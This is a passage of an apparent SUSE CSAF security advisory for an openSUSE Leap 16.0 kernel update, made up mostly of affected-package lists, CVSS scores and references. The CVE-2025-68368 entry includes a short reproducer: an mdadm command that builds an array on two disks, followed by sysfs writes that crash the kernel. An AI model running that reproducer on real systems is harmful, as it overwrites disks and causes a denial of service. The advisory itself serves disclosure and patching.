"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68368",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68368"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: init bioset in mddev_init\n\nIO operations may be needed before md_run(), such as updating metadata\nafter writing sysfs. Without bioset, this triggers a NULL pointer\ndereference as below:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000020\n Call Trace:\n md_update_sb+0x658/0xe00\n new_level_store+0xc5/0x120\n md_attr_store+0xc9/0x1e0\n sysfs_kf_write+0x6f/0xa0\n kernfs_fop_write_iter+0x141/0x2a0\n vfs_write+0x1fc/0x5a0\n ksys_write+0x79/0x180\n __x64_sys_write+0x1d/0x30\n x64_sys_call+0x2818/0x2880\n do_syscall_64+0xa9/0x580\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nReproducer\n```\n mdadm -CR /dev/md0 -l1 -n2 /dev/sd[cd]\n echo inactive \u003e /sys/block/md0/md/array_state\n echo 10 \u003e /sys/block/md0/md/new_level\n```\n\nmddev_init() can only be called once per mddev, no need to test if bioset\nhas been initialized anymore.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
